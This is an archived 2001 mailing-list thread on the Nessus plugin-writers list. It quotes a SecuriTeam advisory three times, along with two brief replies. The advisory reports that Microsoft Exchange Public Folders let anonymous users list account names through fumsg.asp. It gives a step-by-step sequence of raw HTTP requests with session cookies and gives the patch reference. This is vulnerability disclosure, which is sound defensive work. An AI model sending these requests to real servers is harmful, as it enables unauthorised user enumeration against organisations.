Mailing List Archive

Fw: Exchange Public Folders Information Leakage
----- Original Message -----
From: "Aviram Jenik" <aviram@BEYONDSECURITY.COM>
To: <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
Sent: Friday, September 07, 2001 11:51 AM
Subject: Exchange Public Folders Information Leakage


> The following security advisory is sent to the securiteam mailing list,
> and
> can be found at the SecuriTeam web site: http://www.securiteam.com
>
> SUMMARY
>
> Microsoft Exchange Server handles anonymous access to its Public Folders
>
> insecurely. While administrators may disable the "Find Users" features
> to
> prevent anonymous users from enumerating existing user names, a security
>
> flaw in Exchange server allows remote attackers with access to the
> exchange server to run "Find Users".
>
> DETAILS
>
> Microsoft Exchange's Public Folders options of "Find Users" can be
> disabled. This, however, does not prevent the users from directly
> accessing the ASP page (fumsg.asp). The link to the "Find Users" will be
>
> hidden, however it is still possible to programmatically access the
> page.
>
> Steps to recreate:
> 1) Contact:
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
>
>
> 2) Access the redirected page, and resend the issued cookie.
> GET /exchange/logonfrm.asp HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 3) Access the redirected page, and resend the issued cookie.
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 4) Issue this request to obtain a list of users with the letter 'a' in
> their name (e.g. Administrator)
> POST /exchange/finduser/fumsg.asp HTTP/1.1
> Host: www.example.com
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 44
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
> DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
>
> Vendor status:
> Microsoft has been contacted on August 4, 2001. A security bulletin was
> released on September 7, 2001.
>
> Solution:
> Microsoft has released a patch for this problem. See
> <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
> rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
> more information.
>
>
> ADDITIONAL INFORMATION
> This security hole was discovered by <mailto:noamr@securiteam.com> Noam
> Rathaus.
> The information has been provided by <mailto:experts@secuiteam.com>
> SecuriTeam Experts.
>
>
>
> ====================
> ====================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without warranty of
> any
> kind.
> In no event shall we be liable for any damages whatsoever including
> direct,
> indirect, incidental, consequential, loss of business profits or special
> damages.
>
>
============================================================================
> Delivery co-sponsored by Trend Micro, Inc.
>
============================================================================
> TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE
>
> If you are worried about email viruses, you need Trend Micro ScanMail for
> Exchange. ScanMail is the first antivirus solution that seamlessly
> integrates with the Microsoft Exchange 2000 virus-scanning API 2.0.
ScanMail
> ensures 100% inbound and outbound email virus scanning and provides remote
> software management. Download a FREE 30-day trial copy of ScanMail and
find
> out why it is the best:
> http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
>
============================================================================
Re: Exchange Public Folders Information Leakage [ In reply to ]
Hi,

Would a plugin writer note write a plugin for an advisory he releases :} ?
Its online at: http://scripts.nessus.org


Thanks
Noam Rathaus
http://www.SecuriTeam.com
http://www.BeyondSecurity.com

Know that you're safe (against Code Red and other vulnerabilities):
http://www.AutomatedScanning.com/


----- Original Message -----
From: Felix Huber
To: plugins-writers@list.nessus.org
Sent: Friday, September 07, 2001 22:55
Subject: Fw: Exchange Public Folders Information Leakage



----- Original Message -----
From: "Aviram Jenik" <aviram@BEYONDSECURITY.COM>
To: <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
Sent: Friday, September 07, 2001 11:51 AM
Subject: Exchange Public Folders Information Leakage


> The following security advisory is sent to the securiteam mailing list,
> and
> can be found at the SecuriTeam web site: http://www.securiteam.com
>
> SUMMARY
>
> Microsoft Exchange Server handles anonymous access to its Public Folders
>
> insecurely. While administrators may disable the "Find Users" features
> to
> prevent anonymous users from enumerating existing user names, a security
>
> flaw in Exchange server allows remote attackers with access to the
> exchange server to run "Find Users".
>
> DETAILS
>
> Microsoft Exchange's Public Folders options of "Find Users" can be
> disabled. This, however, does not prevent the users from directly
> accessing the ASP page (fumsg.asp). The link to the "Find Users" will be
>
> hidden, however it is still possible to programmatically access the
> page.
>
> Steps to recreate:
> 1) Contact:
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
>
>
> 2) Access the redirected page, and resend the issued cookie.
> GET /exchange/logonfrm.asp HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 3) Access the redirected page, and resend the issued cookie.
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 4) Issue this request to obtain a list of users with the letter 'a' in
> their name (e.g. Administrator)
> POST /exchange/finduser/fumsg.asp HTTP/1.1
> Host: www.example.com
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 44
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
> DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
>
> Vendor status:
> Microsoft has been contacted on August 4, 2001. A security bulletin was
> released on September 7, 2001.
>
> Solution:
> Microsoft has released a patch for this problem. See
> <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
> rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
> more information.
>
>
> ADDITIONAL INFORMATION
> This security hole was discovered by <mailto:noamr@securiteam.com> Noam
> Rathaus.
> The information has been provided by <mailto:experts@secuiteam.com>
> SecuriTeam Experts.
>
>
>
> ====================
> ====================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without warranty of
> any
> kind.
> In no event shall we be liable for any damages whatsoever including
> direct,
> indirect, incidental, consequential, loss of business profits or special
> damages.
>
>
============================================================================
> Delivery co-sponsored by Trend Micro, Inc.
>
============================================================================
> TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE
>
> If you are worried about email viruses, you need Trend Micro ScanMail for
> Exchange. ScanMail is the first antivirus solution that seamlessly
> integrates with the Microsoft Exchange 2000 virus-scanning API 2.0.
ScanMail
> ensures 100% inbound and outbound email virus scanning and provides remote
> software management. Download a FREE 30-day trial copy of ScanMail and
find
> out why it is the best:
> http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
>
============================================================================
Re: Exchange Public Folders Information Leakage [ In reply to ]
Sorry,

Note = Not

Thanks
Noam Rathaus
http://www.SecuriTeam.com
http://www.BeyondSecurity.com

Know that you're safe (against Code Red and other vulnerabilities):
http://www.AutomatedScanning.com/


----- Original Message -----
From: Noam Rathaus
To: Felix Huber ; plugins-writers@list.nessus.org
Sent: Friday, September 07, 2001 23:51
Subject: Re: Exchange Public Folders Information Leakage


Hi,

Would a plugin writer note write a plugin for an advisory he releases :} ?
Its online at: http://scripts.nessus.org


Thanks
Noam Rathaus
http://www.SecuriTeam.com
http://www.BeyondSecurity.com

Know that you're safe (against Code Red and other vulnerabilities):
http://www.AutomatedScanning.com/


----- Original Message -----
From: Felix Huber
To: plugins-writers@list.nessus.org
Sent: Friday, September 07, 2001 22:55
Subject: Fw: Exchange Public Folders Information Leakage



----- Original Message -----
From: "Aviram Jenik" <aviram@BEYONDSECURITY.COM>
To: <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>
Sent: Friday, September 07, 2001 11:51 AM
Subject: Exchange Public Folders Information Leakage


> The following security advisory is sent to the securiteam mailing list,
> and
> can be found at the SecuriTeam web site: http://www.securiteam.com
>
> SUMMARY
>
> Microsoft Exchange Server handles anonymous access to its Public Folders
>
> insecurely. While administrators may disable the "Find Users" features
> to
> prevent anonymous users from enumerating existing user names, a security
>
> flaw in Exchange server allows remote attackers with access to the
> exchange server to run "Find Users".
>
> DETAILS
>
> Microsoft Exchange's Public Folders options of "Find Users" can be
> disabled. This, however, does not prevent the users from directly
> accessing the ASP page (fumsg.asp). The link to the "Find Users" will be
>
> hidden, however it is still possible to programmatically access the
> page.
>
> Steps to recreate:
> 1) Contact:
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
>
>
> 2) Access the redirected page, and resend the issued cookie.
> GET /exchange/logonfrm.asp HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 3) Access the redirected page, and resend the issued cookie.
> GET /exchange/root.asp?acs=anon HTTP/1.1
> Host: www.example.com
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
>
> 4) Issue this request to obtain a list of users with the letter 'a' in
> their name (e.g. Administrator)
> POST /exchange/finduser/fumsg.asp HTTP/1.1
> Host: www.example.com
> Accept: */*
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 44
> Cookie: ASPSESSIONIDGGQGQGFW=EABMCPIDGABPDJIKNOGBBPPN
>
> DN=a&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=
>
> Vendor status:
> Microsoft has been contacted on August 4, 2001. A security bulletin was
> released on September 7, 2001.
>
> Solution:
> Microsoft has released a patch for this problem. See
> <http://www.microsoft.com/technet/treeview/default.asp?url=/technet/secu
> rity/bulletin/MS01-047.asp> Microsoft Security Bulletin MS01-047 for
> more information.
>
>
> ADDITIONAL INFORMATION
> This security hole was discovered by <mailto:noamr@securiteam.com> Noam
> Rathaus.
> The information has been provided by <mailto:experts@secuiteam.com>
> SecuriTeam Experts.
>
>
>
> ====================
> ====================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without warranty of
> any
> kind.
> In no event shall we be liable for any damages whatsoever including
> direct,
> indirect, incidental, consequential, loss of business profits or special
> damages.
>
>
============================================================================
> Delivery co-sponsored by Trend Micro, Inc.
>
============================================================================
> TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE
>
> If you are worried about email viruses, you need Trend Micro ScanMail for
> Exchange. ScanMail is the first antivirus solution that seamlessly
> integrates with the Microsoft Exchange 2000 virus-scanning API 2.0.
ScanMail
> ensures 100% inbound and outbound email virus scanning and provides remote
> software management. Download a FREE 30-day trial copy of ScanMail and
find
> out why it is the best:
> http://www.antivirus.com/banners/tracking.asp?si=8&BI;=240&UL;=/smex2000
>
============================================================================